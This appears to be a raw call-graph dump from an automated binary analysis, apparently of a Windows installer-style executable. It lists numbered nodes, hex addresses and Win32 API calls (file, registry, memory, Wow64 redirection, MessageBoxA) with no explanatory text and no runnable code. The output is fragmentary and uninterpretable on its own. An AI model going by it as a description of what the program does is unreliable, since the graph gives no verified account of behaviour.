5399 4059f1 5398->5399 5400 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5399->5400 5401 405a0b 5400->5401 5401->5391 5403 4039ab 5402->5403 5408 4038b4 5403->5408 5405 4039cb 5406 403198 4 API calls 5405->5406 5407 4039d2 5406->5407 5407->5378 5409 4038d5 5408->5409 5410 4038c8 5408->5410 5412 403934 5409->5412 5413 4038db 5409->5413 5411 403780 6 API calls 5410->5411 5418 4038d0 5411->5418 5416 403993 5412->5416 5417 40393b 5412->5417 5414 4038e1 5413->5414 5415 4038ee 5413->5415 5419 403894 6 API calls 5414->5419 5420 403894 6 API calls 5415->5420 5421 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5416->5421 5422 403941 5417->5422 5423 40394b 5417->5423 5418->5405 5419->5418 5425 4038fc 5420->5425 5421->5418 5426 403864 9 API calls 5422->5426 5424 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5423->5424 5427 40395d 5424->5427 5428 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5425->5428 5426->5418 5429 403864 9 API calls 5427->5429 5430 403917 5428->5430 5431 403976 5429->5431 5432 40374c VariantClear 5430->5432 5433 40374c VariantClear 5431->5433 5434 40392c 5432->5434 5435 40398b 5433->5435 5434->5405 5435->5405 5437 4034fd 5436->5437 5444 40352d 5436->5444 5438 403526 5437->5438 5441 403509 5437->5441 5442 403254 4 API calls 5438->5442 5439 403198 4 API calls 5440 403517 5439->5440 5440->5133 5451 4025c4 5441->5451 5442->5444 5444->5439 5446 407cd3 5445->5446 5449 407cc8 5445->5449 5455 407c5c 5446->5455 5449->5137 5450 405880 4 API calls 5450->5449 5452 4025ca 5451->5452 5453 4025dc 5452->5453 5454 403154 4 API calls 5452->5454 5453->5440 5453->5453 5454->5453 5456 407c70 5455->5456 5457 407caf 5455->5457 5456->5457 5459 407bac 5456->5459 5457->5449 5457->5450 5460 407bb7 5459->5460 5461 407bc8 5459->5461 5462 405880 4 API calls 5460->5462 5463 4074a0 20 API calls 5461->5463 5462->5461 5464 407bdc 5463->5464 5465 4074a0 20 API calls 5464->5465 5466 407bfd 5465->5466 5467 407918 InterlockedExchange 5466->5467 5468 407c12 5467->5468 5469 407c28 5468->5469 5470 405880 4 API calls 5468->5470 5469->5456 5470->5469 5472 4078d6 5471->5472 5473 4078e7 5471->5473 5474 4078db InterlockedExchange 5472->5474 5473->5019 5474->5473 6247 409e47 6248 409e6c 6247->6248 6249 4098f4 15 API calls 6248->6249 6253 409e71 6249->6253 6250 409ec4 6281 4026c4 GetSystemTime 6250->6281 6252 409ec9 6254 409330 32 API calls 6252->6254 6253->6250 6256 408dd8 4 API calls 6253->6256 6255 409ed1 6254->6255 6257 4031e8 4 API calls 6255->6257 6258 409ea0 6256->6258 6259 409ede 6257->6259 6261 409ea8 MessageBoxA 6258->6261 6260 406928 5 API calls 6259->6260 6262 409eeb 6260->6262 6261->6250 6263 409eb5 6261->6263 6264 4066c0 5 API calls 6262->6264 6265 405854 5 API calls 6263->6265 6266 409efb 6264->6266 6265->6250 6267 406638 5 API calls 6266->6267 6268 409f0c 6267->6268 6269 403340 4 API calls 6268->6269 6270 409f1a 6269->6270 6271 4031e8 4 API calls 6270->6271 6272 409f2a 6271->6272 6273 4074e0 23 API calls 6272->6273 6274 409f69 6273->6274 6275 402594 4 API calls 6274->6275 6276 409f89 6275->6276 6277 407a28 5 API calls 6276->6277 6278 409fcb 6277->6278 6279 407cb8 21 API calls 6278->6279 6280 409ff2 6279->6280 6281->6252 6208 407548 6209 407554 CloseHandle 6208->6209 6210 40755d 6208->6210 6209->6210 6660 402b48 RaiseException 6211 407749 6212 4076dc WriteFile 6211->6212 6218 407724 6211->6218 6213 4076e8 6212->6213 6214 4076ef 6212->6214 6215 40748c 21 API calls 6213->6215 6216 407700 6214->6216 6217 4073ec 20 API calls 6214->6217 6215->6214 6217->6216 6218->6211 6219 4077e0 6218->6219 6220 4078db InterlockedExchange 6219->6220 6222 407890 6219->6222 6221 4078e7 6220->6221 6661 40294a 6664 402952 6661->6664 6662 403554 4 API calls 6662->6664 6663 402967 6664->6662 6664->6663 6665 403f4a 6666 403f53 6665->6666 6667 403f5c 6665->6667 6669 403f07 6666->6669 6672 403f09 6669->6672 6671 403f3c 6671->6667 6673 403154 4 API calls 6672->6673 6675 403e9c 6672->6675 6679 403f3d 6672->6679 6692 403e9c 6672->6692 6673->6672 6674 403ef2 6677 402674 4 API calls 6674->6677 6675->6671 6675->6674 6678 403ea9 6675->6678 6683 403e8e 6675->6683 6681 403ecf 6677->6681 6678->6681 6682 402674 4 API calls 6678->6682 6679->6667 6681->6667 6682->6681 6684 403e4c 6683->6684 6685 403e62 6684->6685 6686 403e7b 6684->6686 6689 403e67 6684->6689 6688 403cc8 4 API calls 6685->6688 6687 402674 4 API calls 6686->6687 6690 403e78 6687->6690 6688->6689 6689->6690 6691 402674 4 API calls 6689->6691 6690->6674 6690->6678 6691->6690 6693 403ed7 6692->6693 6698 403ea9 6692->6698 6694 403ef2 6693->6694 6695 403e8e 4 API calls 6693->6695 6696 402674 4 API calls 6694->6696 6697 403ee6 6695->6697 6700 403ecf 6696->6700 6697->6694 6697->6698 6699 402674 4 API calls 6698->6699 6698->6700 6699->6700 6700->6672 6709 405150 6710 405163 6709->6710 6711 404e48 19 API calls 6710->6711 6712 405177 6711->6712 6282 403a52 6283 403a74 6282->6283 6284 403a5a WriteFile 6282->6284 6284->6283 6285 403a78 GetLastError 6284->6285 6285->6283 6286 402654 6287 403154 4 API calls 6286->6287 6289 402614 6287->6289 6288 402632 6288->6288 6289->6288 6290 403154 4 API calls 6289->6290 6290->6288 5657 409e62 5658 409aa0 4 API calls 5657->5658 5659 409e67 5658->5659 5660 409e6c 5659->5660 5760 402f24 5659->5760 5694 4098f4 5660->5694 5663 409ec4 5699 4026c4 GetSystemTime 5663->5699 5665 409ec9 5700 409330 5665->5700 5666 409e71 5666->5663 5765 408dd8 5666->5765 5670 4031e8 4 API calls 5672 409ede 5670->5672 5671 409ea0 5674 409ea8 MessageBoxA 5671->5674 5718 406928 5672->5718 5674->5663 5676 409eb5 5674->5676 5768 405854 5676->5768 5681 409f0c 5745 403340 5681->5745 5683 409f1a 5684 4031e8 4 API calls 5683->5684 5685 409f2a 5684->5685 5686 4074e0 23 API calls 5685->5686 5687 409f69 5686->5687 5688 402594 4 API calls 5687->5688 5689 409f89 5688->5689 5690 407a28 5 API calls 5689->5690 5691 409fcb 5690->5691 5692 407cb8 21 API calls 5691->5692 5693 409ff2 5692->5693 5772 40953c 5694->5772 5699->5665 5703 409350 5700->5703 5704 409375 CreateDirectoryA 5703->5704 5709 408dd8 4 API calls 5703->5709 5714 407284 5 API calls 5703->5714 5717 405880 4 API calls 5703->5717 5864 406cf4 5703->5864 5887 409224 5703->5887 5906 404c84 5703->5906 5909 408da8 5703->5909 5705 4093ed 5704->5705 5706 40937f GetLastError 5704->5706 5707 40322c 4 API calls 5705->5707 5706->5703 5708 4093f7 5707->5708 5710 4031b8 4 API calls 5708->5710 5709->5703 5712 409411 5710->5712 5713 4031b8 4 API calls 5712->5713 5715 40941e 5713->5715 5714->5703 5715->5670 5717->5703 6019 406820 5718->6019 5721 403454 4 API calls 5722 40694a 5721->5722 5723 4066c0 5722->5723 6024 4068e4 5723->6024 5726 4066f0 5728 403340 4 API calls 5726->5728 5727 4066fe 5729 403454 4 API calls 5727->5729 5730 4066fc 5728->5730 5731 406711 5729->5731 5733 403198 4 API calls 5730->5733 5732 403340 4 API calls 5731->5732 5732->5730 5734 406733 5733->5734 5735 406638 5734->5735 5736 406642 5735->5736 5737 406665 5735->5737 6030 406950 5736->6030 5738 40322c 4 API calls 5737->5738 5740 40666e 5738->5740 5740->5681 5741 406649 5741->5737 5742 406654 5741->5742 5743 403340 4 API calls 5742->5743 5744 406662 5743->5744 5744->5681 5746 403344 5745->5746 5747 4033a5 5745->5747 5748 40334c 5746->5748 5749 4031e8 5746->5749 5748->5747 5751 4031e8 4 API calls 5748->5751 5754 40335b 5748->5754 5753 403254 4 API calls 5749->5753 5755 4031fc 5749->5755 5750 403228 5750->5683 5751->5754 5752 403254 4 API calls 5757 403375 5752->5757 5753->5755 5754->5752 5755->5750 5756 4025ac 4 API calls 5755->5756 5756->5750 5758 4031e8 4 API calls 5757->5758 5759 4033a1 5758->5759 5759->5683 5761 403154 4 API calls 5760->5761 5762 402f29 5761->5762 6036 402bcc 5762->6036 5764 402f51 5764->5764 5766 408da8 4 API calls 5765->5766 5767 408df4 5766->5767 5767->5671 5769 405859 5768->5769 5770 405930 5 API calls 5769->5770 5771 40586b 5770->5771 5771->5771 5778 40955b 5772->5778 5773 409590 5775 40959d GetUserDefaultLangID 5773->5775 5780 409592 5773->5780 5774 409594 5790 407024 GetModuleHandleA GetProcAddress 5774->5790 5775->5780 5778->5773 5778->5774 5779 40956f 5778->5779 5784 409884 5779->5784 5780->5779 5781 4095cb GetACP 5780->5781 5782 4095ef 5780->5782 5781->5779 5781->5780 5782->5779 5783 409615 GetACP 5782->5783 5783->5779 5783->5782 5785 40988c 5784->5785 5789 4098c6 5784->5789 5786 403420 4 API calls 5785->5786 5785->5789 5787 4098c0 5786->5787 5848 408e80 5787->5848 5789->5666 5791 407067 5790->5791 5792 40705e 5790->5792 5793 407070 5791->5793 5794 4070a8 5791->5794 5803 403198 4 API calls 5792->5803 5811 406f68 5793->5811 5796 406f68 RegOpenKeyExA 5794->5796 5798 4070c1 5796->5798 5797 407089 5799 4070de 5797->5799 5814 406f5c 5797->5814 5798->5799 5800 406f5c 6 API calls 5798->5800 5801 40322c 4 API calls 5799->5801 5804 4070d5 RegCloseKey 5800->5804 5805 4070eb 5801->5805 5807 407120 5803->5807 5804->5799 5817 4032fc 5805->5817 5809 403198 4 API calls 5807->5809 5810 407128 5809->5810 5810->5780 5812 406f73 5811->5812 5813 406f79 RegOpenKeyExA 5811->5813 5812->5813 5813->5797 5831 406e10 5814->5831 5818 403300 5817->5818 5819 40333f 5817->5819 5820 40330a 5818->5820 5824 4031e8 5818->5824 5819->5792 5821 403334 5820->5821 5822 40331d 5820->5822 5825 4034f0 4 API calls 5821->5825 5823 4034f0 4 API calls 5822->5823 5830 403322 5823->5830 5827 403254 4 API calls 5824->5827 5828 4031fc 5824->5828 5825->5830 5826 403228 5826->5792 5827->5828 5828->5826 5829 4025ac 4 API calls 5828->5829 5829->5826 5830->5792 5832 406e36 RegQueryValueExA 5831->5832 5833 406e7b 5832->5833 5838 406e59 5832->5838 5835 403198 4 API calls 5833->5835 5834 406e73 5836 403198 4 API calls 5834->5836 5837 406f47 RegCloseKey 5835->5837 5836->5833 5837->5799 5838->5833 5838->5834 5839 403278 4 API calls 5838->5839 5840 403420 4 API calls 5838->5840 5839->5838 5841 406eb0 RegQueryValueExA 5840->5841 5841->5832 5842 406ecc 5841->5842 5842->5833 5843 4034f0 4 API calls 5842->5843 5844 406f0e 5843->5844 5845 406f20 5844->5845 5847 403420 4 API calls 5844->5847 5846 4031e8 4 API calls 5845->5846 5846->5833 5847->5845 5849 408e8e 5848->5849 5851 408ea6 5849->5851 5861 408e18 5849->5861 5852 408e18 4 API calls 5851->5852 5853 408eca 5851->5853 5852->5853 5854 407918 InterlockedExchange 5853->5854 5855 408ee5 5854->5855 5856 408e18 4 API calls 5855->5856 5858 408ef8 5855->5858 5856->5858 5857 408e18 4 API calls 5857->5858 5858->5857 5859 403278 4 API calls 5858->5859 5860 408f27 5858->5860 5859->5858 5860->5789 5862 405880 4 API calls 5861->5862 5863 408e29 5862->5863 5863->5851 5913 406a58 5864->5913 5867 406d26 5869 406a58 5 API calls 5867->5869 5871 406d72 5867->5871 5870 406d36 5869->5870 5872 406a34 7 API calls 5870->5872 5873 406d42 5870->5873 5921 406888 5871->5921 5872->5873 5873->5871 5875 406a58 5 API calls 5873->5875 5884 406d67 5873->5884 5879 406d5b 5875->5879 5878 406638 5 API calls 5880 406d87 5878->5880 5882 406a34 7 API calls 5879->5882 5879->5884 5881 40322c 4 API calls 5880->5881 5883 406d91 5881->5883 5882->5884 5885 4031b8 4 API calls 5883->5885 5884->5871 5933 406cc8 GetWindowsDirectoryA 5884->5933 5886 406dab 5885->5886 5886->5703 5888 409244 5887->5888 5889 406638 5 API calls 5888->5889 5890 40925d 5889->5890 5891 40322c 4 API calls 5890->5891 5898 409268 5891->5898 5893 406978 6 API calls 5893->5898 5894 4033b4 4 API calls 5894->5898 5895 408dd8 4 API calls 5895->5898 5897 405880 4 API calls 5897->5898 5898->5893 5898->5894 5898->5895 5898->5897 5899 4092e4 5898->5899 5973 4091b0 5898->5973 5981 409034 5898->5981 5900 40322c 4 API calls 5899->5900 5901 4092ef 5900->5901 5902 4031b8 4 API calls 5901->5902 5903 409309 5902->5903 5904 403198 4 API calls 5903->5904 5905 409311 5904->5905 5905->5703 5907 405198 19 API calls 5906->5907 5908 404ca2 5907->5908 5908->5703 5910 408dc8 5909->5910 6009 408c80 5910->6009 5914 4034f0 4 API calls 5913->5914 5915 406a6b 5914->5915 5916 406a82 GetEnvironmentVariableA 5915->5916 5920 406a95 5915->5920 5935 406dec 5915->5935 5916->5915 5917 406a8e 5916->5917 5918 403198 4 API calls 5917->5918 5918->5920 5920->5867 5930 406a34 5920->5930 5922 403414 5921->5922 5923 4068ab GetFullPathNameA 5922->5923 5924 4068b7 5923->5924 5925 4068ce 5923->5925 5924->5925 5926 4068bf 5924->5926 5927 40322c 4 API calls 5925->5927 5928 403278 4 API calls 5926->5928 5929 4068cc 5927->5929 5928->5929 5929->5878 5939 4069dc 5930->5939 5934 406ce9 5933->5934 5934->5871 5936 406dfa 5935->5936 5937 4034f0 4 API calls 5936->5937 5938 406e08 5937->5938 5938->5915 5946 406978 5939->5946 5941 4069fe 5942 406a06 GetFileAttributesA 5941->5942 5943 406a1b 5942->5943 5944 403198 4 API calls 5943->5944 5945 406a23 5944->5945 5945->5867 5956 406744 5946->5956 5948 4069b0 5951 4069c6 5948->5951 5952 4069bb 5948->5952 5950 406989 5950->5948 5963 406970 CharPrevA 5950->5963 5964 403454 5951->5964 5953 40322c 4 API calls 5952->5953 5955 4069c4 5953->5955 5955->5941 5960 406755 5956->5960 5957 4067b9 5958 4067b4 5957->5958 5959 406680 IsDBCSLeadByte 5957->5959 5958->5950 5959->5958 5960->5957 5962 406773 5960->5962 5962->5958 5971 406680 IsDBCSLeadByte 5962->5971 5963->5950 5965 403486 5964->5965 5966 403459 5964->5966 5967 403198 4 API calls 5965->5967 5966->5965 5969 40346d 5966->5969 5968 40347c 5967->5968 5968->5955 5970 403278 4 API calls 5969->5970 5970->5968 5972 406694 5971->5972 5972->5962 5974 403198 4 API calls 5973->5974 5976 4091d1 5974->5976 5978 4091fe 5976->5978 5990 4032a8 5976->5990 5993 403494 5976->5993 5979 403198 4 API calls 5978->5979 5980 409213 5979->5980 5980->5898 5997 408f70 5981->5997 5983 40904a 5984 40904e 5983->5984 6003 406a48 5983->6003 5984->5898 5987 409081 6006 408fac 5987->6006 5991 403278 4 API calls 5990->5991 5992 4032b5 5991->5992 5992->5976 5994 4034c3 5993->5994 5995 403498 5993->5995 5994->5976 5996 4034f0 4 API calls 5995->5996 5996->5994 5998 408f7a 5997->5998 5999 408f7e 5997->5999 5998->5983 6000 408fa0 SetLastError 5999->6000 6001 408f87 Wow64DisableWow64FsRedirection 5999->6001 6002 408f9b 6000->6002 6001->6002 6002->5983 6004 4069dc 7 API calls 6003->6004 6005 406a52 GetLastError 6004->6005 6005->5987 6007 408fb1 Wow64RevertWow64FsRedirection 6006->6007 6008 408fbb 6006->6008 6007->6008 6008->5898 6010 403198 4 API calls 6009->6010 6011 408cb1 6009->6011 6010->6011 6013 408cc8 6011->6013 6015 403278 4 API calls 6011->6015 6017 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6011->6017 6018 408cdc 6011->6018 6012 4031b8 4 API calls 6014 408d69 6012->6014 6016 4032fc 4 API calls 6013->6016 6014->5703 6015->6011 6016->6018 6017->6011 6018->6012 6020 406744 IsDBCSLeadByte 6019->6020 6022 406835 6020->6022 6021 40687f 6021->5721 6022->6021 6023 406680 IsDBCSLeadByte 6022->6023 6023->6022 6025 4068f3 6024->6025 6026 406820 IsDBCSLeadByte 6025->6026 6029 4068fe 6026->6029 6027 4066ea 6027->5726 6027->5727 6028 406680 IsDBCSLeadByte 6028->6029 6029->6027 6029->6028 6031 406957 6030->6031 6032 40695b 6030->6032 6031->5741 6035 406970 CharPrevA 6032->6035 6034 40696c 6034->5741 6035->6034 6037 402bd5 RaiseException 6036->6037 6038 402be6 6036->6038 6037->6038 6038->5764 6291 402e64 6292 402e69 6291->6292 6293 402e7a RtlUnwind 6292->6293 6294 402e5e 6292->6294 6295 402e9d 6293->6295 6312 40667c IsDBCSLeadByte 6313 406694 6312->6313 6725 403f7d 6727 403fa2 6725->6727 6729 403f84 6725->6729 6726 403f8c 6728 403e8e 4 API calls 6727->6728 6727->6729 6728->6729 6729->6726 6730 402674 4 API calls 6729->6730 6731 403fca 6730->6731 6738 403d02 6740 403d12 6738->6740 6739 403ddf ExitProcess 6740->6739 6741 403db8 6740->6741 6743 403dea 6740->6743 6748 403da4 6740->6748 6749 403d8f MessageBoxA 6740->6749 6742 403cc8 4 API calls 6741->6742 6744 403dc2 6742->6744 6745 403cc8 4 API calls 6744->6745 6746 403dcc 6745->6746 6758 4019dc 6746->6758 6754 403fe4 6748->6754 6749->6741 6750 403dd1 6750->6739 6750->6743 6755 403fe8 6754->6755 6756 403f07 4 API calls 6755->6756 6757 404006 6756->6757 6759 401abb 6758->6759 6760 4019ed 6758->6760 6759->6750 6761 401a04 RtlEnterCriticalSection 6760->6761 6762 401a0e LocalFree 6760->6762 6761->6762 6763 401a41 6762->6763 6764 401a2f VirtualFree 6763->6764 6765 401a49 6763->6765 6764->6763 6766 401a70 LocalFree 6765->6766 6767 401a87 6765->6767 6766->6766 6766->6767 6768 401aa9 RtlDeleteCriticalSection 6767->6768 6769 401a9f RtlLeaveCriticalSection 6767->6769 6768->6750 6769->6768 6322 404206 6323 4041cc 6322->6323 6326 40420a 6322->6326 6324 404282 6325 403154 4 API calls 6327 404323 6325->6327 6326->6324 6326->6325 6328 402c08 6331 402c82 6328->6331 6332 402c19 6328->6332 6329 402c56 RtlUnwind 6330 403154 4 API calls 6329->6330 6330->6331 6332->6329 6332->6331 6335 402b28 6332->6335 6336 402b31 RaiseException 6335->6336 6337 402b47 6335->6337 6336->6337 6337->6329 6338 408c10 6339 408c17 6338->6339 6340 403198 4 API calls 6339->6340 6347 408cb1 6340->6347 6341 408cdc 6342 4031b8 4 API calls 6341->6342 6344 408d69 6342->6344 6343 408cc8 6346 4032fc 4 API calls 6343->6346 6345 403278 4 API calls 6345->6347 6346->6341 6347->6341 6347->6343 6347->6345 6348 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6347->6348 6348->6347 6349 40a011 6350 40a036 6349->6350 6351 407918 InterlockedExchange 6350->6351 6353 40a060 6351->6353 6352 40a070 6359 4076ac SetEndOfFile 6352->6359 6353->6352 6354 409aa0 4 API calls 6353->6354 6354->6352 6356 40a08c 6357 4025ac 4 API calls 6356->6357 6358 40a0c3 6357->6358 6360 4076c3 6359->6360 6361 4076bc 6359->6361 6360->6356 6362 40748c 21 API calls 6361->6362 6362->6360 6774 409916 6775 409918 6774->6775 6776 409956 CallWindowProcA 6775->6776 6777 40993a 6775->6777 6776->6777 6090 407017 6091 407008 SetErrorMode 6090->6091 6367 403018 6368 403070 6367->6368 6369 403025 6367->6369 6370 40302a RtlUnwind 6369->6370 6371 40304e 6370->6371 6373 402f78 6371->6373 6374 402be8 6371->6374 6375 402bf1 RaiseException 6374->6375 6376 402c04 6374->6376 6375->6376 6376->6368 6784 409918 6785 40993a 6784->6785 6787 409927 6784->6787 6786 409956 CallWindowProcA 6786->6785 6787->6785 6787->6786 6381 40901e 6382 409010 6381->6382 6383 408fac Wow64RevertWow64FsRedirection 6382->6383 6384 409018 6383->6384 6385 409020 SetLastError 6386 409029 6385->6386 6397 403a28 ReadFile 6398 403a46 6397->6398 6399 403a49 GetLastError 6397->6399 6228 40762c ReadFile 6229 407663 6228->6229 6230 40764c 6228->6230 6231 407652 GetLastError 6230->6231 6232 40765c 6230->6232 6231->6229 6231->6232 6233 40748c 21 API calls 6232->6233 6233->6229 6404 40a02c 6405 409aa0 4 API calls 6404->6405 6406 40a031 6405->6406 6407 40a036 6406->6407 6408 402f24 5 API calls 6406->6408 6409 407918 InterlockedExchange 6407->6409 6408->6407 6410 40a060 6409->6410 6411 40a070 6410->6411 6412 409aa0 4 API calls 6410->6412 6413 4076ac 22 API calls 6411->6413 6412->6411 6414 40a08c 6413->6414 6415 4025ac 4 API calls 6414->6415 6416 40a0c3 6415->6416 6788 40712e 6789 407118 6788->6789 6790 403198 4 API calls 6789->6790 6791 407120 6790->6791 6792 403198 4 API calls 6791->6792 6793 407128 6792->6793 6794 408f30 6797 408dfc 6794->6797 6798 408e05 6797->6798 6799 403198 4 API calls 6798->6799 6800 408e13 6798->6800 6799->6798 6801 403932 6802 403924 6801->6802 6805 40374c 6802->6805 6804 40392c 6806 403766 6805->6806 6807 403759 6805->6807 6806->6804 6807->6806 6808 403779 VariantClear 6807->6808 6808->6804 6039 4075c4 SetFilePointer 6040 4075f7 6039->6040 6041 4075e7 GetLastError 6039->6041 6041->6040 6042 4075f0 6041->6042 6043 40748c 21 API calls 6042->6043 6043->6040 6417 405ac4 6418 405ad4 6417->6418 6419 405acc 6417->6419 6420 405ad2 6419->6420 6421 405adb 6419->6421 6424 405a3c 6420->6424 6422 405930 5 API calls 6421->6422 6422->6418 6425 405a44 6424->6425 6426 405a5e 6425->6426 6427 403154 4 API calls 6425->6427 6428 405a63 6426->6428 6429 405a7a 6426->6429 6427->6425 6430 405930 5 API calls 6428->6430 6431 403154 4 API calls 6429->6431 6432 405a76 6430->6432 6433 405a7f 6431->6433 6435 403154 4 API calls 6432->6435 6434 4059a0 19 API calls 6433->6434 6434->6432 6436 405aa8 6435->6436 6437 403154 4 API calls 6436->6437 6438 405ab6 6437->6438 6438->6418 6439 4076c8 WriteFile 6440 4076e8 6439->6440 6441 4076ef 6439->6441 6442 40748c 21 API calls 6440->6442 6443 407700 6441->6443 6444 4073ec 20 API calls 6441->6444 6442->6441 6444->6443 6445 40a2ca 6454 4096fc 6445->6454 6448 402f24 5 API calls 6449 40a2d4 6448->6449 6450 403198 4 API calls 6449->6450 6451 40a2f3 6450->6451 6452 403198 4 API calls 6451->6452 6453 40a2fb 6452->6453 6463 40569c 6454->6463 6456 409745 6460 403198 4 API calls 6456->6460 6457 409717 6457->6456 6469 40720c 6457->6469 6459 409735 6462 40973d MessageBoxA 6459->6462 6461 40975a 6460->6461 6461->6448 6462->6456 6464 403154 4 API calls 6463->6464 6465 4056a1 6464->6465 6466 4056b9 6465->6466 6467 403154 4 API calls 6465->6467 6466->6457 6468 4056af 6467->6468 6468->6457 6470 40569c 4 API calls 6469->6470 6471 40721b 6470->6471 6472 407221 6471->6472 6473 40722f 6471->6473 6474 40322c 4 API calls 6472->6474 6476 40724b 6473->6476 6477 40723f 6473->6477 6475 40722d 6474->6475 6475->6459 6487 4032b8 6476->6487 6480 4071d0 6477->6480 6481 40322c 4 API calls 6480->6481 6482 4071df 6481->6482 6483 4071fc 6482->6483 6484 406950 CharPrevA 6482->6484 6483->6475 6485 4071eb 6484->6485 6485->6483 6486 4032fc 4 API calls 6485->6486 6486->6483 6488 403278 4 API calls 6487->6488 6489 4032c2 6488->6489 6489->6475 6490 402ccc 6491 402cdd 6490->6491 6495 402cfe 6490->6495 6492 402d88 RtlUnwind 6491->6492 6494 402b28 RaiseException 6491->6494 6491->6495 6493 403154 4 API calls 6492->6493 6493->6495 6496 402d7f 6494->6496 6496->6492 6817 403fcd 6818 403f07 4 API calls 6817->6818 6819 403fd6 6818->6819 6820 403e9c 4 API calls 6819->6820 6821 403fe2 6820->6821 5475 4024d0 5476 4024e4 5475->5476 5477 4024f7 5475->5477 5514 401918 RtlInitializeCriticalSection 5476->5514 5479 402518 5477->5479 5480 40250e RtlEnterCriticalSection 5477->5480 5491 402300 5479->5491 5480->5479 5483 4024ed 5485 402525 5488 402581 5485->5488 5489 402577 RtlLeaveCriticalSection 5485->5489 5487 402531 5487->5485 5521 40215c 5487->5521 5489->5488 5492 402314 5491->5492 5493 402335 5492->5493 5494 4023b8 5492->5494 5495 402344 5493->5495 5535 401b74 5493->5535 5494->5495 5499 402455 5494->5499 5538 401d80 5494->5538 5546 401e84 5494->5546 5495->5485 5501 401fd4 5495->5501 5499->5495 5542 401d00 5499->5542 5502 401fe8 5501->5502 5503 401ffb 5501->5503 5505 401918 4 API calls 5502->5505 5504 402012 RtlEnterCriticalSection 5503->5504 5508 40201c 5503->5508 5504->5508 5506 401fed 5505->5506 5506->5503 5507 401ff1 5506->5507 5511 402052 5507->5511 5508->5511 5628 401ee0 5508->5628 5511->5487 5512 402147 5512->5487 5513 40213d RtlLeaveCriticalSection 5513->5512 5515 40193c RtlEnterCriticalSection 5514->5515 5516 401946 5514->5516 5515->5516 5517 401964 LocalAlloc 5516->5517 5518 40197e 5517->5518 5519 4019c3 RtlLeaveCriticalSection 5518->5519 5520 4019cd 5518->5520 5519->5520 5520->5477 5520->5483 5522 40217a 5521->5522 5523 402175 5521->5523 5525 4021ab RtlEnterCriticalSection 5522->5525 5528 4021b5 5522->5528 5529 40217e 5522->5529 5524 401918 4 API calls 5523->5524 5524->5522 5525->5528 5526 4021c1 5530 4022e3 RtlLeaveCriticalSection 5526->5530 5531 4022ed 5526->5531 5527 402244 5527->5529 5532 401d80 7 API calls 5527->5532 5528->5526 5528->5527 5533 402270 5528->5533 5529->5485 5530->5531 5531->5485 5532->5529 5533->5526 5534 401d00 7 API calls 5533->5534 5534->5526 5536 40215c 9 API calls 5535->5536 5537 401b95 5536->5537 5537->5495 5539 401d89 5538->5539 5540 401d92 5538->5540 5539->5540 5541 401b74 9 API calls 5539->5541 5540->5494 5541->5540 5543 401d4e 5542->5543 5544 401d1e 5542->5544 5543->5544 5551 401c68 5543->5551 5544->5495 5606 401768 5546->5606 5548 401e99 5549 401ea6 5548->5549 5617 401dcc 5548->5617 5549->5494 5552 401c7a 5551->5552 5553 401c9d 5552->5553 5554 401caf 5552->5554 5564 40188c 5553->5564 5555 40188c 3 API calls 5554->5555 5557 401cad 5555->5557 5558 401cc5 5557->5558 5574 401b44 5557->5574 5558->5544 5560 401cd4 5561 401cee 5560->5561 5579 401b98 5560->5579 5584 4013a0 5561->5584 5565 4018b2 5564->5565 5566 40190b 5564->5566 5588 401658 5565->5588 5566->5557 5571 4018e6 5571->5566 5573 4013a0 LocalAlloc 5571->5573 5573->5566 5575 401b61 5574->5575 5576 401b52 5574->5576 5575->5560 5577 401d00 9 API calls 5576->5577 5578 401b5f 5577->5578 5578->5560 5580 401b9d 5579->5580 5582 401bab 5579->5582 5581 401b74 9 API calls 5580->5581 5583 401baa 5581->5583 5582->5561 5583->5561 5585 4013ab 5584->5585 5586 4013c6 5585->5586 5587 4012e4 LocalAlloc 5585->5587 5586->5558 5587->5586 5591 40168f 5588->5591 5589 4016cf 5592 40132c 5589->5592 5590 4016a9 VirtualFree 5590->5591 5591->5589 5591->5590 5593 401348 5592->5593 5600 4012e4 5593->5600 5596 40150c 5599 40153b 5596->5599 5597 401594 5597->5571 5598 401568 VirtualFree 5598->5599 5599->5597 5599->5598 5603 40128c 5600->5603 5604 401298 LocalAlloc 5603->5604 5605 4012aa 5603->5605 5604->5605 5605->5571 5605->5596 5608 401787 5606->5608 5607 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5607->5608 5608->5607 5609 40183b 5608->5609 5610 40132c LocalAlloc 5608->5610 5612 401821 5608->5612 5614 4017d6 5608->5614 5615 4017e7 5609->5615 5624 4015c4 5609->5624 5610->5608 5613 40150c VirtualFree 5612->5613 5613->5615 5616 40150c VirtualFree 5614->5616 5615->5548 5616->5615 5618 401d80 9 API calls 5617->5618 5619 401de0 5618->5619 5620 40132c LocalAlloc 5619->5620 5621 401df0 5620->5621 5622 401df8 5621->5622 5623 401b44 9 API calls 5621->5623 5622->5549 5623->5622 5625 40160a 5624->5625 5626 40163a 5625->5626 5627 401626 VirtualAlloc 5625->5627 5626->5615 5627->5625 5627->5626 5631 401ef0 5628->5631 5629 401f1c 5630 401d00 9 API calls 5629->5630 5633 401f40 5629->5633 5630->5633 5631->5629 5631->5633 5634 401e58 5631->5634 5633->5512 5633->5513 5639 4016d8 5634->5639 5637 401e75 5637->5631 5638 401dcc 9 API calls 5638->5637 5642 4016f4 5639->5642 5640 4016fe 5643 4015c4 VirtualAlloc 5640->5643 5642->5640 5644 40175b 5642->5644 5645 40132c LocalAlloc 5642->5645 5646 40174f 5642->5646 5649 401430 5642->5649 5647 40170a 5643->5647 5644->5637 5644->5638 5645->5642 5648 40150c VirtualFree 5646->5648 5647->5644 5648->5644 5650 40143f VirtualAlloc 5649->5650 5652 40146c 5650->5652 5653 40148f 5650->5653 5654 4012e4 LocalAlloc 5652->5654 5653->5642 5655 401478 5654->5655 5655->5653 5656 40147c VirtualFree 5655->5656 5656->5653 6497 4028d2 6498 4028da 6497->6498 6499 403554 4 API calls 6498->6499 6500 4028ef 6498->6500 6499->6498 6501 4025ac 4 API calls 6500->6501 6502 4028f4 6501->6502 6822 4019d3 6823 4019ba 6822->6823 6824 4019c3 RtlLeaveCriticalSection 6823->6824 6825 4019cd 6823->6825 6824->6825 6044 407fd4 6045 407fe6 6044->6045 6047 407fed 6044->6047 6055 407f10 6045->6055 6048 408015 